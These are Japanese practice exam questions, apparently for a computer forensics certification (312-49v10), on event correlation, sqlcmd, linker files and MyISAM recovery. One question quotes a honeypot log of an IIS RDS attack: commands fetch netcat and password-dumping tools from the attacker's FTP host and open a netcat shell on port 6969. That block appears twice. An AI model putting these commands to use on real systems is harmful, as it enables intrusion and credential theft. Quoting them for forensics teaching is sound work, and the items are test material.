312-49v10 試験問題 61
イベント相関関係は、最終結果を生み出すイベント間の関連性を見つけるプロセスです。組織が一連のサーバー、システム、ルーター、およびネットワーク全体でイベントを相関させるには、どのような種類の相関関係が役立ちますか?
312-49v10 試験問題 62
調査者は、データベースからプライマリ データ ファイルとログを収集する一環として、コマンド sqlcmd -S WIN-CQQMK62867E -e -s"," -E を入力します。「WIN-CQQMK62867E」は何を表しますか?
312-49v10 試験問題 63
システムのリンカが理解できるブロックに編成されたバイトのシーケンスはどのファイルですか?
312-49v10 試験問題 64
次の抜粋は、lab.wiretrip.net でホストされているハニーポット ログから抜粋したものです。Short は、213.116.251.162 からの Unicode 攻撃を報告しました。ファイル権限の正規化の脆弱性 (UNICODE 攻撃) により、通常はスクリプトを実行する権限がない任意のフォルダーでスクリプトが実行される可能性があります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini の表示に成功します。
次に、msadcs.dll を介して RDS でのプレイに切り替えます。RDS の脆弱性により、悪意のあるユーザーが IIS サーバー上でシェル コマンド (CMD.EXE など) を実行する SQL ステートメントを作成することができます。彼は簡単なクエリを実行してディレクトリが存在することを確認し、msadcs.dll へのクエリを実行すると、それが正しく機能していることがわかりました。攻撃者は RDS クエリを作成し、その結果、以下に示すコマンドが実行されます。
「cmd1.exe /c open 213.116.251.162 >ftpcom」
「cmd1.exe /c echo johna2k >>ftpcom」
「cmd1.exe /c echo haxedj00 >>ftpcom」
「cmd1.exe /c echo get nc.exe >>ftpcom」
「cmd1.exe /c echo get pdump.exe >>ftpcom」
「cmd1.exe /c echo get samdump.dll >>ftpcom」
「cmd1.exe /c echo quit >>ftpcom」
「cmd1.exe /c ftp -s:ftpcom」
「cmd1.exe /c nc -l -p 6969 -e cmd1.exe」
与えられたエクスプロイトから何が推測できますか?
次に、msadcs.dll を介して RDS でのプレイに切り替えます。RDS の脆弱性により、悪意のあるユーザーが IIS サーバー上でシェル コマンド (CMD.EXE など) を実行する SQL ステートメントを作成することができます。彼は簡単なクエリを実行してディレクトリが存在することを確認し、msadcs.dll へのクエリを実行すると、それが正しく機能していることがわかりました。攻撃者は RDS クエリを作成し、その結果、以下に示すコマンドが実行されます。
「cmd1.exe /c open 213.116.251.162 >ftpcom」
「cmd1.exe /c echo johna2k >>ftpcom」
「cmd1.exe /c echo haxedj00 >>ftpcom」
「cmd1.exe /c echo get nc.exe >>ftpcom」
「cmd1.exe /c echo get pdump.exe >>ftpcom」
「cmd1.exe /c echo get samdump.dll >>ftpcom」
「cmd1.exe /c echo quit >>ftpcom」
「cmd1.exe /c ftp -s:ftpcom」
「cmd1.exe /c nc -l -p 6969 -e cmd1.exe」
与えられたエクスプロイトから何が推測できますか?
312-49v10 試験問題 65
あなたには、MyISAM ストレージ エンジンに関連するログ ファイルを調査するタスクが割り当てられています。調査中に、MyISAM ログ ファイルに対して回復操作を実行するように求められます。次の MySQL ユーティリティのうち、これを実行できるものはどれですか?